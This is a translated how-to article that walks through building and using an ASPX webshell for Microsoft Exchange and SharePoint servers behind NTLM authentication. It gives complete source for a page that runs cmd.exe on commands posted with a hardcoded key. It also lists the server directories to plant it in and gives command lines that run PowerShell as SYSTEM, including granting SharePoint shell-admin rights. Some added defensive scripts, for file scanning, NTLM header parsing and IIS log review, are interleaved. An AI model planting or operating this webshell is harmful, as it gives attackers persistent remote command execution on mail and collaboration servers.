2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article explains how a webshell that supports the NTLM Over HTTP protocol can be implemented and used. Many readers may be unfamiliar with the topic, so the editor has summarized the following in the hope that it is useful.
In some environments, access to resources on a Web server requires NTLM authentication over the NTLM Over HTTP protocol. To use a webshell on such a server, we need to consider not only how the NTLM authentication is implemented, but also how to drive the webshell from the command line.
0x02 Design Ideas
There are many Web servers that authenticate NTLM over HTTP, such as Exchange and SharePoint.
(1)Exchange Test Environment
Absolute path to save file:
C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\Autodiscover\test.aspx
The corresponding URL is:
https://URL/Autodiscover/test.aspx
(2)SharePoint Test Environment
Absolute path to save file:
C:\Program Files\Common Files\microsoft shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\test.aspx
The corresponding URL is:
http://URL/_layouts/15/test.aspx
NTLM authentication over the NTLM Over HTTP protocol is required to access test.aspx.
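Both directories above are locations a defender can watch for unexpected .aspx files. The following Python script is an added example, not code from the original article or from the aspxCmdNTLM project: it walks the two directories named on the page, reports every .aspx file whose source contains command-execution indicators, and prints its modification time so the list can be compared against a deployment baseline. The indicator patterns, the two-indicator threshold and the idea of a baseline are assumptions of this example.

```python
import os
import re
import sys
from datetime import datetime, timezone

# The two directories named in the article. The example only reads them.
WATCHED_DIRS = [
    r"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\Autodiscover",
    r"C:\Program Files\Common Files\microsoft shared\Web Server Extensions\15\TEMPLATE\LAYOUTS",
]

# Source-level indicators of command execution in an .aspx page.
# Assumed patterns for this example; tune them to your own environment.
INDICATORS = [
    ("process_start", re.compile(r"Process\.Start|ProcessStartInfo", re.I)),
    ("shell_binary", re.compile(r"cmd\.exe|powershell(\.exe)?", re.I)),
    ("form_input", re.compile(r"Request\.Form", re.I)),
    ("base64_decode", re.compile(r"FromBase64String", re.I)),
    ("hardcoded_key", re.compile(r"const\s+string\s+\w*(KEY|PASS|AUTH)\w*\s*=", re.I)),
]


def suspicious_indicators(source):
    """Return the indicator names that match one .aspx source text, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(source)]


def is_suspicious(source):
    """Process creation alone is enough; otherwise require two weaker indicators together."""
    found = suspicious_indicators(source)
    return "process_start" in found or len(found) >= 2


def scan_directory(root):
    """Yield (path, mtime_utc, indicators) for every .aspx file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".aspx"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                source = fh.read()
            mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
            yield path, mtime, suspicious_indicators(source)


if __name__ == "__main__":
    # Scan the directories given on the command line, or the watched ones that exist.
    roots = sys.argv[1:] or [d for d in WATCHED_DIRS if os.path.isdir(d)]
    for root in roots:
        for path, mtime, found in scan_directory(root):
            if found:
                print(f"{mtime:%Y-%m-%d %H:%M:%S}Z  {path}  {','.join(found)}")
```

Run it on a known-good copy of the directory first and keep that output as the baseline; on a production server, any .aspx that matches and is not in the baseline deserves a look, regardless of its name.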
Here is an example of a webshell that supports cmd commands. The webshell address is:
https://github.com/tennc/webshell/blob/master/aspx/asp.net-backdoors/cmdexec.aspx
[Screenshot omitted]
This webshell is operated through a browser: first complete NTLM authentication, then fill in the correct Auth Key and the cmd command to execute.
Our goal is to make it usable from the command line, so that it can be modified into a template. The design is as follows:
(1)execCmd.aspx
Receives the Form request and verifies the Auth Key parameter
If validation fails, return null result
If the validation is successful, execute the incoming cmd command and return the execution result
(2)aspxCmdNTLM.py
A command-line script
NTLM authentication over the NTLM Over HTTP protocol is completed first; two login methods, plaintext password and user password hash, need to be supported.
Send Auth Key and cmd command to be executed through Form request, receive cmd command execution result.
The communication between execCmd.aspx and aspxCmdNTLM.py is Base64 encoded, so Base64 encoding and decoding need to be handled in both programs.
0x03 Script Development Details
1.execCmd.aspx
The Page_Load method receives the Form request, where data1 is the Auth Key and data2 is the cmd command.
Base64 encoding implementation:
    byte[] enbytes = Encoding.Default.GetBytes(string1);
    string string2 = Convert.ToBase64String(enbytes);
Base64 decoding implementation:
    byte[] outbyte = Convert.FromBase64String(string1);
    string string2 = Encoding.Default.GetString(outbyte);
The complete implementation code is as follows:

    <%@ Page Language="C#" %>
    <%@ Import Namespace="System.Diagnostics" %>
    <%@ Import Namespace="System.IO" %>
    <script runat="server">
    private const string AUTHKEY = "UGFzc3dvcmQxMjM0NTY3ODk";

    protected void Page_Load(object sender, EventArgs e)
    {
        // data1 is the Auth Key, data2 the Base64-encoded cmd command
        string data1 = Request.Form["data1"];
        if (data1 != AUTHKEY)
        {
            return;
        }
        string data2 = Request.Form["data2"];
        byte[] outbyte = Convert.FromBase64String(data2);
        string payload = Encoding.Default.GetString(outbyte);
        string outstr1 = ExecuteCommand(payload);
        // the result is returned Base64 encoded as well
        byte[] enbytes = Encoding.Default.GetBytes(outstr1);
        string outstr2 = Convert.ToBase64String(enbytes);
        Response.Write(outstr2);
    }

    private string ExecuteCommand(string command)
    {
        try
        {
            ProcessStartInfo processStartInfo = new ProcessStartInfo();
            processStartInfo.FileName = "cmd.exe";
            processStartInfo.Arguments = "/c " + command;
            processStartInfo.RedirectStandardOutput = true;
            processStartInfo.UseShellExecute = false;
            Process process = Process.Start(processStartInfo);
            using (StreamReader streamReader = process.StandardOutput)
            {
                string ret = streamReader.ReadToEnd();
                return ret;
            }
        }
        catch (Exception ex)
        {
            return ex.ToString();
        }
    }
    </script>

2.aspxCmdNTLM.py
The NTLM authentication implementation can reuse the code from an earlier script:
https://github.com/3gstudent/Homework-of-Python/blob/master/checkEWS.py
Supports plaintext and user password hash login
Form requests are sent via POST
Base64 encoding and decoding must take the string encoding (bytes versus text) into account
The complete code has been uploaded to github at the following address:
https://github.com/3gstudent/Homework-of-Python/blob/master/aspxCmdNTLM.py
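On the wire, NTLM Over HTTP carries its three messages Base64-encoded in the Authorization and WWW-Authenticate headers, and the final AUTHENTICATE_MESSAGE (type 3) names the domain, user and workstation in clear. That makes the header a useful attribution source when reviewing proxy or web-server captures. The following Python script is an added example, not part of the article or of the checkEWS.py/aspxCmdNTLM.py scripts it references: it classifies an NTLM header by message type and extracts the identity fields from a type 3 message following the MS-NLMP layout (signature, type, six length/offset field descriptors, negotiate flags). The sample type 3 message is constructed inside the block with dummy challenge responses, so no real credential material is involved.

```python
import base64
import struct

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_MESSAGE, CHALLENGE_MESSAGE, AUTHENTICATE_MESSAGE = 1, 2, 3
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001   # payload strings are UTF-16LE, else OEM
NTLMSSP_NEGOTIATE_VERSION = 0x02000000


def _decode_header(header_value):
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not token:
        raise ValueError("not an NTLM Authorization/WWW-Authenticate header")
    msg = base64.b64decode(token)
    if msg[:8] != SIGNATURE:
        raise ValueError("bad NTLMSSP signature")
    return msg


def ntlm_message_type(header_value):
    """1 = NEGOTIATE (client), 2 = CHALLENGE (server), 3 = AUTHENTICATE (client)."""
    return struct.unpack_from("<I", _decode_header(header_value), 8)[0]


def _field(msg, offset):
    # Each variable field descriptor is Len(2) MaxLen(2) BufferOffset(4); the
    # offset is counted from the start of the message.
    length, _maxlen, buf_offset = struct.unpack_from("<HHI", msg, offset)
    return msg[buf_offset:buf_offset + length]


def parse_type3(header_value):
    """Extract identity fields from an AUTHENTICATE_MESSAGE (type 3)."""
    msg = _decode_header(header_value)
    if struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE_MESSAGE:
        raise ValueError("not an AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp437"
    nt_response = _field(msg, 20)
    return {
        "domain": _field(msg, 28).decode(enc),
        "user": _field(msg, 36).decode(enc),
        "workstation": _field(msg, 44).decode(enc),
        "ntlmv2": len(nt_response) > 24,   # an NTLMv1 response is exactly 24 bytes
        "flags": flags,
    }


def build_sample_type3(domain, user, workstation):
    """CONSTRUCTED sample for this example: dummy challenge responses, no real crypto."""
    enc = "utf-16-le"
    # Payload order matches the descriptor order: LM, NT, domain, user, workstation, session key.
    payload = [b"\x00" * 24, b"\x11" * 48, domain.encode(enc),
               user.encode(enc), workstation.encode(enc), b""]
    header_len = 88   # fixed part including the optional Version and MIC
    msg = bytearray(SIGNATURE + struct.pack("<I", AUTHENTICATE_MESSAGE))
    offset = header_len
    for data in payload:
        msg += struct.pack("<HHI", len(data), len(data), offset)
        offset += len(data)
    msg += struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_VERSION)
    msg += bytes(8) + bytes(16)   # Version and MIC, zeroed in this sample
    for data in payload:
        msg += data
    return "NTLM " + base64.b64encode(bytes(msg)).decode("ascii")


if __name__ == "__main__":
    header = build_sample_type3("TEST", "user1", "WS01")
    print(ntlm_message_type(header), parse_type3(header))
```

The `ntlmv2` flag is the detail worth logging: a type 3 message carrying a 24-byte NT response means the client fell back to NTLMv1, which is a weaker exchange than the NTLMv2 that current Windows clients send by default.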
execCmd.aspx needs to be saved on the Web server
aspxCmdNTLM.py is executed at the command line; it connects to execCmd.aspx, executes the cmd command and retrieves the returned result
aspxCmdNTLM.py supports plaintext and user password hash login
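From the server side, this workflow is visible in the IIS W3C logs: an NTLM handshake shows up as 401 responses followed by a 200 from the same client, and the webshell itself is a successful POST to an .aspx page that the deployment never had. The following Python script is an added example (not from the article or the aspxCmdNTLM project) that parses a constructed log excerpt, flags successful POSTs to .aspx pages under the Autodiscover and _layouts paths that are not in a baseline of known endpoints, and lists the clients that went through an NTLM challenge. The log lines, the baseline set and the watched prefixes are assumptions of this example.

```python
# Constructed IIS W3C log excerpt for this example (not from the page).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2025-01-16 10:00:01 192.168.1.1 POST /autodiscover/autodiscover.xml - 443 TEST\user1 192.168.1.50 Microsoft+Office/16.0 200 0 0 31
2025-01-16 10:00:05 192.168.1.1 POST /Autodiscover/execCmd.aspx - 443 - 192.168.1.77 python-requests/2.31.0 401 2 5 0
2025-01-16 10:00:05 192.168.1.1 POST /Autodiscover/execCmd.aspx - 443 - 192.168.1.77 python-requests/2.31.0 401 1 2148074254 0
2025-01-16 10:00:06 192.168.1.1 POST /Autodiscover/execCmd.aspx - 443 TEST\user1 192.168.1.77 python-requests/2.31.0 200 0 0 120
2025-01-16 10:00:09 192.168.1.1 GET /_layouts/15/start.aspx - 443 TEST\user2 192.168.1.60 Mozilla/5.0 200 0 0 15
"""

# Assumed baseline of legitimate endpoints under the NTLM-protected paths; in
# practice build it from the files your own deployment actually ships.
WATCHED_PREFIXES = ("/autodiscover/", "/_layouts/")
BASELINE_ENDPOINTS = {"/autodiscover/autodiscover.xml", "/_layouts/15/start.aspx"}


def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            tokens = line.split()
            if fields and len(tokens) == len(fields):
                records.append(dict(zip(fields, tokens)))
    return records


def find_suspicious_requests(records, baseline=BASELINE_ENDPOINTS):
    """Successful POSTs to .aspx pages under watched prefixes that are not in the baseline."""
    hits = []
    for r in records:
        uri = r["cs-uri-stem"].lower()
        if (r["cs-method"] == "POST" and uri.endswith(".aspx")
                and uri.startswith(WATCHED_PREFIXES) and uri not in baseline
                and r["sc-status"] == "200"):
            hits.append(r)
    return hits


def ntlm_handshake_clients(records):
    """Client IPs that received a 401.2 (authentication challenge) on a watched path.
    The 401 -> 401 -> 200 sequence in the sample is the typical shape of an NTLM
    Over HTTP handshake in IIS logs."""
    return sorted({r["c-ip"] for r in records
                   if r["sc-status"] == "401" and r["sc-substatus"] == "2"
                   and r["cs-uri-stem"].lower().startswith(WATCHED_PREFIXES)})


if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    for hit in find_suspicious_requests(recs):
        print(f'{hit["date"]} {hit["time"]} {hit["c-ip"]} {hit["cs-username"]} '
              f'POST {hit["cs-uri-stem"]} ua={hit["cs(User-Agent)"]}')
    print("clients that went through an NTLM challenge:", ntlm_handshake_clients(recs))
```

The authenticated POST is the line that matters: once NTLM has succeeded, the webshell runs as the authenticated account (or as the application pool identity, as the page notes for Exchange), so the cs-username on the 200 line tells you which credentials were used to reach it.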
On Exchange servers, the webshell runs with System permissions.
[Screenshot omitted]
Exchange PowerShell can therefore be called directly.
Command example:
python aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/Autodiscover/execCmd.aspx plaintext test.com user1 Password123! "powershell -c \"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;;Get-MailboxServer\""
[Screenshot of the results omitted]
On SharePoint servers, the webshell runs with ordinary user permissions.
[Screenshot omitted]
Calling SharePoint Server PowerShell in the same way:
Command example:
python aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/Autodiscover/execCmd.aspx plaintext test.com user1 Password123! "powershell -c \"Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPSite\""
Note that the user must be configured with access to the database before SharePoint Server PowerShell commands can be executed.
The PowerShell command for viewing the list of users who can access the database is as follows:
Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPShellAdmin
The PowerShell command for granting the specified user access to the database is as follows:
Add-PSSnapin Microsoft.SharePoint.PowerShell;Add-SPShellAdmin Domain\User1
The PowerShell command for removing database access from the specified user is as follows:
Add-PSSnapin Microsoft.SharePoint.PowerShell;Remove-SPShellAdmin Domain\User1 -Confirm:$false
[Screenshot of the normal results omitted]
© 2024 shulou.com SLNews company. All rights reserved.